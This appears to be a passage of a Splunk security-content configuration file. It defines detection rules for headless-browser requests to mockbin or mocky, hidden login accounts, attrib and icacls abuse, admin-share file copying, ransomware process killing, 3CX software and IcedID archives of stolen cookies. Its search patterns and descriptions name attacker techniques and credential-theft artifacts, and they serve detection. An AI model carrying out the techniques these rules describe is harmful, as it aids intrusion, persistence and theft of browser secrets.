action.escu.creation_date = 2023-09-11 action.escu.modification_date = 2023-09-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Headless Browser Mockbin or Mocky Request - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Forest Blizzard"] action.risk = 1 action.risk.param._risk_message = Headless browser activity accessing mockbin.org or mocky.io detected on $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Headless Browser Mockbin or Mocky Request - Rule action.correlationsearch.annotations = {"analytic_story": ["Forest Blizzard"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies headless browser activity accessing mockbin.org or mocky.io. Mockbin.org and mocky.io are web services that allow users to mock HTTP requests and responses. The detection is based on the presence of "--headless" and "--disable-gpu" command line arguments which are commonly used in headless browsing and the presence of mockbin.org or mocky.io in the process. 
action.notable.param.rule_title = Headless Browser Mockbin or Mocky Request action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="*--headless*" AND Processes.process="*--disable-gpu*" AND (Processes.process="*mockbin.org/*" OR Processes.process="*mocky.io/*")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `headless_browser_mockbin_or_mocky_request_filter` [ESCU - Headless Browser Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic is designed to detect the usage of headless browsers in an organization. Headless browsers are web browsers without a graphical user interface and are operated via a command line interface or network requests. They are often used for automating tasks but can also be utilized by adversaries for malicious activities such as web scraping, automated testing, and performing actions on web pages without detection. The detection is based on the presence of "--headless" and "--disable-gpu" command line arguments which are commonly used in headless browsing. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic is designed to detect the usage of headless browsers in an organization. 
Headless browsers are web browsers without a graphical user interface and are operated via a command line interface or network requests. They are often used for automating tasks but can also be utilized by adversaries for malicious activities such as web scraping, automated testing, and performing actions on web pages without detection. The detection is based on the presence of "--headless" and "--disable-gpu" command line arguments which are commonly used in headless browsing. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = This hunting analytic is meant to assist with baselining and understanding headless browsing in use. Filter as needed. 
action.escu.creation_date = 2023-09-08 action.escu.modification_date = 2023-09-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Headless Browser Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Forest Blizzard"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Headless Browser Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Forest Blizzard"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="*--headless*" AND Processes.process="*--disable-gpu*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `headless_browser_usage_filter` [ESCU - Hide User Account From Sign-In Screen - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a suspicious registry modification to hide a user account on the Windows Login screen. 
This technique was seen in some tradecraft where the adversary will create a hidden user account with Admin privileges in login screen to avoid noticing by the user that they already compromise and to persist on that said machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a suspicious registry modification to hide a user account on the Windows Login screen. This technique was seen in some tradecraft where the adversary will create a hidden user account with Admin privileges in login screen to avoid noticing by the user that they already compromise and to persist on that said machine. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = Unknown. Filter as needed. 
action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Hide User Account From Sign-In Screen - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Windows Registry Abuse", "Azorult", "Warzone RAT"] action.risk = 1 action.risk.param._risk_message = Suspicious registry modification ($registry_value_name$) which is used go hide a user account on the Windows Login screen detected on $dest$ executed by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "registry_value_name", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Hide User Account From Sign-In Screen - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Windows Registry Abuse", "Azorult", "Warzone RAT"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a suspicious registry modification to hide a user account on the Windows Login screen. 
This technique was seen in some tradecraft where the adversary will create a hidden user account with Admin privileges in login screen to avoid noticing by the user that they already compromise and to persist on that said machine. action.notable.param.rule_title = Hide User Account From Sign-In Screen action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path="*\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist*" AND Registry.registry_value_data = "0x00000000") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `hide_user_account_from_sign_in_screen_filter` [ESCU - Hiding Files And Directories With Attrib exe - Rule] action.escu = 0 action.escu.enabled = 1 description = Attackers leverage an existing Windows binary, attrib.exe, to mark specific as hidden by using specific flags so that the victim does not see the file. The search looks for specific command-line arguments to detect the use of attrib.exe to hide files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222", "T1222.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Attackers leverage an existing Windows binary, attrib.exe, to mark specific as hidden by using specific flags so that the victim does not see the file. The search looks for specific command-line arguments to detect the use of attrib.exe to hide files. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some applications and users may legitimately use attrib.exe to interact with the files. action.escu.creation_date = 2024-01-01 action.escu.modification_date = 2024-01-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Hiding Files And Directories With Attrib exe - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Persistence Techniques", "Azorult"] action.risk = 1 action.risk.param._risk_message = Attrib.exe with +h flag to hide files on $dest$ executed by $user$ is detected. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Hiding Files And Directories With Attrib exe - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Persistence Techniques", "Azorult"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222", "T1222.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Attackers leverage an existing Windows binary, attrib.exe, to mark specific as hidden by using specific flags so that the victim does not see the file. The search looks for specific command-line arguments to detect the use of attrib.exe to hide files. 
action.notable.param.rule_title = Hiding Files And Directories With Attrib exe action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=attrib.exe (Processes.process=*+h*) by Processes.parent_process_name Processes.process_name Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)`| `hiding_files_and_directories_with_attrib_exe_filter` [ESCU - High Frequency Copy Of Files In Network Share - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a suspicious high frequency copying/moving of files in network share as part of information sabotage. This anomaly event can be a good indicator of insider trying to sabotage data by transfering classified or internal files within network share to exfitrate it after or to lure evidence of insider attack to other user. This behavior may catch several noise if network share is a common place for classified or internal document processing. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is to detect a suspicious high frequency copying/moving of files in network share as part of information sabotage. This anomaly event can be a good indicator of insider trying to sabotage data by transfering classified or internal files within network share to exfitrate it after or to lure evidence of insider attack to other user. 
This behavior may catch several noise if network share is a common place for classified or internal document processing. action.escu.how_to_implement = o successfully implement this search, you need to be ingesting Windows Security Event Logs with 5145 EventCode enabled. The Windows TA is also required. Also enable the object Audit access success/failure in your group policy. action.escu.known_false_positives = this behavior may seen in normal transfer of file within network if network share is common place for sharing documents. action.escu.creation_date = 2021-11-16 action.escu.modification_date = 2021-11-16 action.escu.confidence = high action.escu.full_search_name = ESCU - High Frequency Copy Of Files In Network Share - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Information Sabotage", "Insider Threat"] action.risk = 1 action.risk.param._risk_message = high frequency copy of document in network share $Share_Name$ from $Source_Address$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 9}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - High Frequency Copy Of Files In Network Share - Rule action.correlationsearch.annotations = {"analytic_story": ["Information Sabotage", "Insider Threat"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = 
`wineventlog_security` EventCode=5145 Relative_Target_Name IN ("*.doc","*.docx","*.xls","*.xlsx","*.ppt","*.pptx","*.log","*.txt","*.db","*.7z","*.zip","*.rar","*.tar","*.gz","*.jpg","*.gif","*.png","*.bmp","*.pdf","*.rtf","*.key") Object_Type=File Share_Name IN ("\\\\*\\C$","\\\\*\\IPC$","\\\\*\\admin$") Access_Mask= "0x2" | bucket _time span=5m | stats values(Relative_Target_Name) as valRelativeTargetName, values(Share_Name) as valShareName, values(Object_Type) as valObjectType, values(Access_Mask) as valAccessmask, values(src_port) as valSrcPort, values(Source_Address) as valSrcAddress count as numShareName by dest, _time, EventCode, user | eventstats avg(numShareName) as avgShareName, stdev(numShareName) as stdShareName, count as numSlots by dest, _time, EventCode, user | eval upperThreshold=(avgShareName + stdShareName *3) | eval isOutlier=if(avgShareName > 20 and avgShareName >= upperThreshold, 1, 0) | search isOutlier=1 | `high_frequency_copy_of_files_in_network_share_filter` [ESCU - High Process Termination Frequency - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is designed to identify a high frequency of process termination events on a computer in a short period of time, which is a common behavior of ransomware malware before encrypting files. This technique is designed to avoid an exception error while accessing (docs, images, database and etc..) in the infected machine for encryption. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is designed to identify a high frequency of process termination events on a computer in a short period of time, which is a common behavior of ransomware malware before encrypting files. This technique is designed to avoid an exception error while accessing (docs, images, database and etc..) in the infected machine for encryption. 
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the Image (process full path of terminated process) from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = admin or user tool that can terminate multiple process. action.escu.creation_date = 2022-09-14 action.escu.modification_date = 2022-09-14 action.escu.confidence = high action.escu.full_search_name = ESCU - High Process Termination Frequency - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Clop Ransomware", "LockBit Ransomware", "BlackByte Ransomware", "Rhysida Ransomware", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = High frequency process termination (more than 15 processes within 3s) detected on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "proc_terminated", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - High Process Termination Frequency - Rule action.correlationsearch.annotations = {"analytic_story": ["Clop Ransomware", "LockBit Ransomware", "BlackByte Ransomware", "Rhysida Ransomware", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = 
`sysmon` EventCode=5 |bin _time span=3s |stats values(Image) as proc_terminated min(_time) as firstTime max(_time) as lastTime count by _time dest EventCode ProcessID | where count >= 15 | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `high_process_termination_frequency_filter` [ESCU - Hunting 3CXDesktopApp Software - Rule] action.escu = 0 action.escu.enabled = 1 description = The hunting analytic outlined below is designed to detect any version of the 3CXDesktopApp, also known as the 3CX Desktop App, operating on either Mac or Windows systems. It is important to note that this particular analytic employs the Endpoint datamodel Processes node, which means that the file version information is not provided. Recently, 3CX has identified a vulnerability specifically in versions 18.12.407 and 18.12.416 of the desktop app. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.002"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The hunting analytic outlined below is designed to detect any version of the 3CXDesktopApp, also known as the 3CX Desktop App, operating on either Mac or Windows systems. It is important to note that this particular analytic employs the Endpoint datamodel Processes node, which means that the file version information is not provided. Recently, 3CX has identified a vulnerability specifically in versions 18.12.407 and 18.12.416 of the desktop app. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. 
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = There may be false positives generated due to the reliance on version numbers for identification purposes. Despite this limitation, the primary goal of this approach is to aid in the detection of the software within the environment. action.escu.creation_date = 2023-03-30 action.escu.modification_date = 2023-03-30 action.escu.confidence = high action.escu.full_search_name = ESCU - Hunting 3CXDesktopApp Software - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["3CX Supply Chain Attack"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Hunting 3CXDesktopApp Software - Rule action.correlationsearch.annotations = {"analytic_story": ["3CX Supply Chain Attack"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-29059"], "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1195.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=3CXDesktopApp.exe OR Processes.process_name="3CX Desktop App" by 
Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `hunting_3cxdesktopapp_software_filter` [ESCU - Icacls Deny Command - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies instances where an adversary modifies the security permissions of a particular file or directory. This technique is frequently observed in the tradecraft of Advanced Persistent Threats (APTs) and coinminer scripts. The purpose of this behavior is to actively evade detection and impede access to their associated files. By identifying these security permission changes, we can enhance our ability to detect and respond to potential threats, mitigating the impact of malicious activities on the system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies instances where an adversary modifies the security permissions of a particular file or directory. This technique is frequently observed in the tradecraft of Advanced Persistent Threats (APTs) and coinminer scripts. The purpose of this behavior is to actively evade detection and impede access to their associated files. By identifying these security permission changes, we can enhance our ability to detect and respond to potential threats, mitigating the impact of malicious activities on the system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. It is possible some administrative scripts use ICacls. Filter as needed. action.escu.creation_date = 2023-06-06 action.escu.modification_date = 2023-06-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Icacls Deny Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Azorult", "Sandworm Tools"] action.risk = 1 action.risk.param._risk_message = Process name $process_name$ with deny argument executed by $user$ to change security permission of a specific file or directory on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Icacls Deny Command - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Azorult", "Sandworm Tools"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.CM"]} 
schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies instances where an adversary modifies the security permissions of a particular file or directory. This technique is frequently observed in the tradecraft of Advanced Persistent Threats (APTs) and coinminer scripts. The purpose of this behavior is to actively evade detection and impede access to their associated files. By identifying these security permission changes, we can enhance our ability to detect and respond to potential threats, mitigating the impact of malicious activities on the system. action.notable.param.rule_title = Icacls Deny Command action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN( "icacls.exe", "cacls.exe", "xcacls.exe") AND Processes.process IN ("*/deny*", "*/D*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `icacls_deny_command_filter` [ESCU - ICACLS Grant Command - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies adversaries who manipulate the security permissions of specific files or directories by granting additional access. This technique is frequently observed in the tradecraft of Advanced Persistent Threats (APTs) and coinminer scripts. The objective behind this behavior is to actively evade detection mechanisms and tightly control access to their associated files. 
By identifying these security permission modifications, we can improve our ability to identify and respond to potential threats, thereby minimizing the impact of malicious activities on the system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies adversaries who manipulate the security permissions of specific files or directories by granting additional access. This technique is frequently observed in the tradecraft of Advanced Persistent Threats (APTs) and coinminer scripts. The objective behind this behavior is to actively evade detection mechanisms and tightly control access to their associated files. By identifying these security permission modifications, we can improve our ability to identify and respond to potential threats, thereby minimizing the impact of malicious activities on the system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. Filter as needed. 
action.escu.creation_date = 2023-06-06 action.escu.modification_date = 2023-06-06 action.escu.confidence = high action.escu.full_search_name = ESCU - ICACLS Grant Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Ransomware"] action.risk = 1 action.risk.param._risk_message = Process name $process_name$ with grant argument executed by $user$ to change security permission of a specific file or directory on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - ICACLS Grant Command - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies adversaries who manipulate the security permissions of specific files or directories by granting additional access. This technique is frequently observed in the tradecraft of Advanced Persistent Threats (APTs) and coinminer scripts. The objective behind this behavior is to actively evade detection mechanisms and tightly control access to their associated files. 
By identifying these security permission modifications, we can improve our ability to identify and respond to potential threats, thereby minimizing the impact of malicious activities on the system. action.notable.param.rule_title = ICACLS Grant Command action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN( "icacls.exe", "cacls.exe", "xcacls.exe") AND Processes.process IN ("*/grant*", "*/G*") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `icacls_grant_command_filter` [ESCU - IcedID Exfiltrated Archived File Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious file creation namely passff.tar and cookie.tar. This files are possible archived of stolen browser information like history and cookies in a compromised machine with IcedID. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious file creation namely passff.tar and cookie.tar. This files are possible archived of stolen browser information like history and cookies in a compromised machine with IcedID. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. 
If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-07-30 action.escu.modification_date = 2021-07-30 action.escu.confidence = high action.escu.full_search_name = ESCU - IcedID Exfiltrated Archived File Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["IcedID"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - IcedID Exfiltrated Archived File Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1560.001", "T1560"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode= 11 (TargetFilename = "*\\passff.tar" OR TargetFilename = "*\\cookie.tar") |stats count min(_time) as firstTime max(_time) as lastTime by TargetFilename EventCode process_id process_name dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `icedid_exfiltrated_archived_file_creation_filter` [ESCU - Impacket Lateral Movement 